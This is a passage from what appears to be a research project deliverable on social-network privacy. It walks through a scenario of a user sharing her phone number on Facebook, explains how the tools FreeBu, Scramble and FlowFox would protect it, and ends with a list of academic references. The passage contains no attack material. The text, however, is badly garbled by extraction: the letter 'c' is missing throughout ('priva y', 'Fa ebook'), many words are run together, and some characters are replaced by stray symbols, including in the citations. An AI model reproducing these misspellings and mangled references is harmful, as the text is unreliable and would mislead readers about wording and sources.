a ustomer satisfa tion survey and by a phone ompany to onvin e her that hoosing another provider would de rease her phone osts.Although this s enario may sound quite unrealisti , all des ribed onse-quen es of posting a phone number on your SNS-pro�le page are possible, evenwhen using the priva y settings of your provider. Indeed, by posting the num-ber, this information was not only visible for everyone Ali e on e a epted asa Fa ebook-friend (in luding her tea her), but it was also leaked to the servi eprovider (Fa ebook) and third ompanies having adds on her pro�le page (e.g.a phone ompany).Now imagine if Ali e and her friends had installed FreeBu, S ramble andFlowfox on their omputer. First of all, by using FreeBu, she ould easily makefriend-lists, something she might not have done without FreeBu be ause of theworkload. These friend-lists are enabling her to hoose more spe i� ally who shewants to share her phone number with. In hoosing to set her priva y-settings,she might then see that she wants to share her number only with her losestfriends and family, and not with all her Fa ebook-friends, in luding her tea her.It allows her to make a detailed and spe i� hoi e before sharing her phonenumber. Se ondly, to prevent Fa ebook from seeing her phone number and toperpetuate the SNS-priva y settings, she uses S ramble. Instead of only usingthe provider's priva y settings, she also en rypts her phone number, so that onlyher losest friends and family an de rypt the information. However, in this ase,the advertising ompanies an still see her phone number by making a s reenshotat the moment she has just typed in the message on her Fa ebook pro�le page,but before she is s rambling the information. Therefore, she also uses Flowfox,disabling the advertisers to take this kind of s reenshot and preventing thepersonal information to be leaked.This example learly shows how the three tools presented in this deliverableare omplementary and building on a safer and more priva y-friendly SNS-environment. This way, the open-sour e software developed by the te hni alpartners of SPION address some of the main existing priva y-and se urity on- erns.Referen es[1℄ Willem De Groef, Dominique Devriese, Ni k Nikiforakis, and FrankPiessens. FlowFox: a Web Browser with Flexible and Pre ise Informa-tion Flow Control. In Pro eedings of the ACM Conferen e on Computerand Communi ations Se urity (CCS), 2012.[2℄ Dominique Devriese and Frank Piessens. Noninterferen e Through Se ureMulti-Exe ution. In Pro eedings of the IEEE Symposium on Se urity andPriva y, pages 109�124, 2010.[3℄ Ni k Nikiforakis, Lu a Invernizzi, Alexandros Kapravelos, StevenVan A ker, Wouter Joosen, Christopher Kruegel, Frank Piessens, and Gio-vanni Vigna. You Are What You In lude: Large-s ale Evaluation of Remote20

JavaS ript In lusions. In Pro eedings of the ACM Conferen e on Computerand Communi ations Se urity (CCS), 2012.[4℄ Tom Reynaert, Willem De Groef, Dominique Devriese, Lieven Desmet, andFrank Piessens. PESAP: a Priva y Enhan ed So ial Appli ation Platform.In Pro eedings of the International Workshop on Se urity and Priva y inSo ial Networks (SPSN), 2012.[5℄ Kapil Singh, Alexander Mosh huk, Helen J. Wang, and Wenke Lee. Onthe In oheren ies in Web Browser A ess Control Poli ies. In Pro eedingsof the IEEE Symposium on Se urity and Priva y, pages 463�478, 2010.[6℄ Mike Ter Louw, Karthik Thotta Ganesh, and V.N. Venkatakrishnan. Ad-jail: Pra ti al Enfor ement of Con�dentiality and Integrity Poli ies on WebAdvertisements. In Pro eedings of the USENIX Se urity Symposium, pages24�24, 2010.[7℄ danah m. boyd. Taken Out of Context: Ameri an Teen So iality in Net-worked Publi s. So ial S ien e Resear h Network Working Paper Series,February 2009. http://www.danah.org/papers/TakenOutOfContext.pdf[2012-08-08℄.[8℄ Za hary Weinberg, Eri Y. Chen, Pavithra Ramesh Jayaraman, and CollinJa kson. I Still Know What You Visited Last Summer: User intera tionand side- hannel atta ks on browsing history. In Pro eedings of the IEEESymposium on Se urity and Priva y, Oakland, CA, USA, May 2011[9℄ Ali e E. Marwi k and danah m boyd. I tweet honestly, I tweet passionately:Twitter users, ontext ollapse, and the imagined audien e. New Media &So iety, 13(1):114�133, February 2011.[10℄ Kate Raynes-Goldie. Aliases, reeping, and wall leaning: Under-standing priva y in the age of fa ebook. First Monday, 15(1),2010. http://firstmonday.org/htbin/ giwrap/bin/ojs/index.php/fm/arti le/view/2775/2432 [2012-08-08℄.[11℄ B. S hilit, N. Adams, and R. Want. Context-aware omputing appli ations.In Pro eedings of the 1994 First Workshop on Mobile Computing Systemsand Appli ations, WMCSA '94, pages 85�90, Washington, DC, USA, 1994.IEEE Computer So iety.[12℄ George Danezis. Inferring priva y poli ies for so ial networking servi es.In Pro eedings of the 2nd ACM workshop on Se urity and arti� ial intelli-gen e, AISe '09, pages 5�10, New York, NY, USA, 2009. ACM.[13℄ Georg Groh. Contextual So ial Networking. PhD thesis, University ofTe hnology, Muni h, 2012. Habilitation thesis in Computer S ien e.[14℄ danah m. boyd. Networked priva y. Retrieved August 9, 2011, 2011. URLhttp://www.danah. org/papers/talks/2011/PDF2011.html.21

[15℄ Amin Tootoon hian, Stefan Saroiu, Yashar Ganjali and Ale Wolman.Lo kr: better priva y for so ial networks. In CoNEXT, pages 169�180,2009.[16℄ Amin Tootoon hian and Kiran Kumar Gollu and Stefan Saroiu and YasharGanjali and Ale Wolman Lo kr: so ial a ess ontrol for web 2.0 InPro eedings of the �rst workshop on Online so ial networks (WOSN), pages43�48, 2008.[17℄ Saikat Guha, Kevin Tang and Paul Fran is. NOYB: priva y in online so ialnetworks, In Pro eedings of the �rst workshop on Online so ial networks(WOSN), pages 49�54, 2008.[18℄ Wanying Luo, Qi Xie and Urs Hengartner. Fa eCloak: An Ar hite ture forUser Priva y on So ial Networking Sites, In CSE, pages 26�33, 2009.

22